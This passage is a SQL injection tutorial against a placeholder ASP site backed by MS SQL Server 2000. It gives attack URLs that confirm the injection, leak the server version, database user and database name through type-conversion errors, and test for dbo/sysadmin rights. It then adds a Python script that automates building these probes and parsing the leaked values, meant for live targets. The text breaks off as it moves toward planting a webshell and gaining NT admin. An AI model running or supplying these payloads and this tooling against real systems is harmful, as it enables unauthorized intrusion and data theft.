As networks move onto the cloud, network security is something nobody can afford to ignore. When we talk about databases, the heavyweights are Oracle and MS SQL, and Microsoft's has had the most vulnerabilities, so today we use SQL injection to make MS SQL work for us.
What follows uses a well-known site as the test target. I assume everyone has already mastered the basic injection techniques for extracting database names, tables and fields, so those are not covered here.
Introduction to MS SQL built-in functions:
@@VERSION returns the SQL Server version string, including the build number (and hence the patch level) and the Windows version it runs on.
USER_NAME() returns the database user that the current connection maps to.
DB_NAME() returns the name of the currently connected database.
HOST_NAME() returns the workstation name reported by the connecting client (here the web server), not the database server's own name.
Together these give us a basic picture of the target system.
OK, let's get started!
Statement:http://www.xxx.com/list.asp?classid=1'
Return information:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' Order By Id DESC'. /list.asp, line 290
The unclosed quotation mark error shows that our single quote was spliced straight into the query, right before the application's own ' Order By Id DESC', so the parameter is injectable. Having found the hole we press on, putting the functions described above to work:
Statement:
http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)
Return:
Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. /list.asp, line 290
The comparison 0<>(select @@version) forces the server to convert the version string to int, and the failed conversion echoes the whole string back in the error. It tells us: Windows NT 5.0 build 2195 with Service Pack 4, i.e. Windows 2000 SP4; SQL Server 2000 Standard Edition, build 8.00.760, which is the SP3 build. With the server identified, the next question is what privileges the database connection has:
Statement:http://www.xxx.com/list.asp?classid=1 and user_name()='dbo'
Return: the page renders normally
This tests whether the connecting user maps to dbo. A connection that is dbo usually belongs to a login in the sysadmin fixed server role, because every sysadmin member is mapped to the dbo user in every database by default (a login that merely owns this one database also maps to dbo, so the test is strong evidence rather than proof).
The logic is the same as the classic 1=1 / 1=2 test: a true condition returns the normal page, a false one does not. That only answers yes or no; we can also make the server spit the value out:
Statement:http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())
Return:Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'dbo' to a column of data type int. /list.asp, line 290
This confirms the connection runs as dbo, so its privileges are high and the login is very likely a member of the sysadmin server role (the direct check is is_srvrolemember('sysadmin')=1, used in the same true/false form as the dbo test).
Statement:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())
Return:Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Gameimgsys' to a column of data type int. /list.asp, line 290
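The probe-and-parse loop used above (the true/false dbo test, and the type-conversion trick that leaks @@version, user_name() and db_name() through the 80040e07 error) can be scripted. The following is an added example written for this edit, not code from the original post: it builds the probe URLs, recovers the leaked value from the conversion error in either the Chinese or the English provider wording, decodes the @@VERSION banner into product, build, service pack and host OS, and adds the is_srvrolemember('sysadmin') probe mentioned above. The response bodies are constructed from the error messages quoted on this page rather than fetched live; the base URL and classid are the page's placeholders, and the build-to-service-pack table is Microsoft's published SQL Server 2000 build list.

```python
import re
from urllib.parse import quote

# Constructed test data: the provider error messages quoted on the page
# (Chinese and English locale wording) plus a stand-in for a page that
# rendered normally.  Nothing here comes from a live request.
SAMPLE_VERSION_ERROR = (
    "Microsoft OLE DB Provider for SQL Server 错误 '80040e07' "
    "将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) "
    "Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation "
    "Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' "
    "转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290"
)
SAMPLE_DBNAME_ERROR = (
    "Microsoft OLE DB Provider for SQL Server error '80040e07' "
    "Syntax error converting the nvarchar value 'Gameimgsys' to a column "
    "of data type int. /list.asp, line 290"
)
SAMPLE_UNCLOSED_QUOTE = (
    "Microsoft OLE DB Provider for SQL Server 错误 '80040e14' "
    "字符串 ' Order By Id DESC' 之前有未闭合的引号。 /list.asp,行290"
)
SAMPLE_NORMAL_PAGE = "<html><body><table><tr><td>item 1</td></tr></table></body></html>"

# Provider error code, e.g. 80040e14 (syntax) or 80040e07 (type conversion).
_CODE_RE = re.compile(r"'(8004[0-9a-fA-F]{4})'")
# Both locales quote the leaked value in single quotes between the word
# "nvarchar" and the target type "int".
_LEAK_RE = re.compile(r"nvarchar[^']*'(.*?)'[^']*\bint\b", re.S)

# SQL Server 2000 engine builds and the service pack each one corresponds to.
SQL2000_BUILDS = {
    "8.00.194": "RTM", "8.00.384": "SP1", "8.00.534": "SP2",
    "8.00.760": "SP3", "8.00.2039": "SP4",
}
# Windows NT kernel versions as they appear in the @@VERSION banner.
NT_VERSIONS = {"5.0": "Windows 2000", "5.1": "Windows XP", "5.2": "Windows Server 2003"}


def build_probe(base_url: str, classid: int, expr: str) -> str:
    """URL that makes the server convert `expr` to int, so the text value
    is echoed back inside the 80040e07 error (the page's leak technique)."""
    payload = f" and 0<>(select {expr})"
    return f"{base_url}?classid={classid}{quote(payload)}"


def build_boolean_probe(base_url: str, classid: int, condition: str) -> str:
    """URL for a true/false test: the page renders normally only when the
    condition holds (the page's user_name()='dbo' check)."""
    return f"{base_url}?classid={classid}{quote(' and ' + condition)}"


def error_code(body: str):
    m = _CODE_RE.search(body)
    return m.group(1).lower() if m else None


def extract_leaked_value(body: str):
    """Value leaked by a type-conversion error, or None for a normal page
    or any other error (e.g. the 80040e14 unclosed-quote message)."""
    if error_code(body) != "80040e07":
        return None
    m = _LEAK_RE.search(body)
    return m.group(1).strip() if m else None


def condition_holds(body: str) -> bool:
    """Boolean oracle: a provider error or a missing result table means false."""
    return error_code(body) is None and "<table>" in body


def parse_version(banner: str) -> dict:
    """Split an @@VERSION banner into product, build, service pack, edition and OS."""
    product = re.match(r"(Microsoft SQL Server \d{4})", banner)
    build = re.search(r"\b(\d+\.\d{2}\.\d+)\b", banner)
    edition = re.search(r"(\w+ Edition)", banner)
    nt = re.search(r"Windows NT (\d\.\d) \(Build \d+: Service Pack (\d+)\)", banner)
    build_s = build.group(1) if build else None
    info = {
        "product": product.group(1) if product else None,
        "build": build_s,
        "service_pack": SQL2000_BUILDS.get(build_s, "unknown"),
        "edition": edition.group(1) if edition else None,
        "os": None,
    }
    if nt:
        os_name = NT_VERSIONS.get(nt.group(1), "Windows NT " + nt.group(1))
        info["os"] = f"{os_name} SP{nt.group(2)}"
    return info


if __name__ == "__main__":
    base = "http://www.xxx.com/list.asp"  # the page's placeholder target
    for expr, body in [("@@version", SAMPLE_VERSION_ERROR), ("db_name()", SAMPLE_DBNAME_ERROR)]:
        print(build_probe(base, 1, expr))
        print("  leaked:", extract_leaked_value(body))
    print(parse_version(extract_leaked_value(SAMPLE_VERSION_ERROR)))
    # is_srvrolemember('sysadmin') is the direct test for the role the page infers from dbo.
    print(build_boolean_probe(base, 1, "is_srvrolemember('sysadmin')=1"))
    print("  condition holds on normal page:", condition_holds(SAMPLE_NORMAL_PAGE))
```

In a real engagement the SAMPLE_* strings are replaced by the HTTP response body of each probe; everything else stays the same, and the regex deliberately keys on the error code rather than on locale-specific wording so the same parser works against a Chinese or an English SQL Server install.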
That leaks the current database name. With a database connection this privileged we naturally want a webshell directly, or even NT admin. Whether NT admin is reachable depends on the server's configuration; if the server is badly configured we can take NT admin directly, and doing so will use: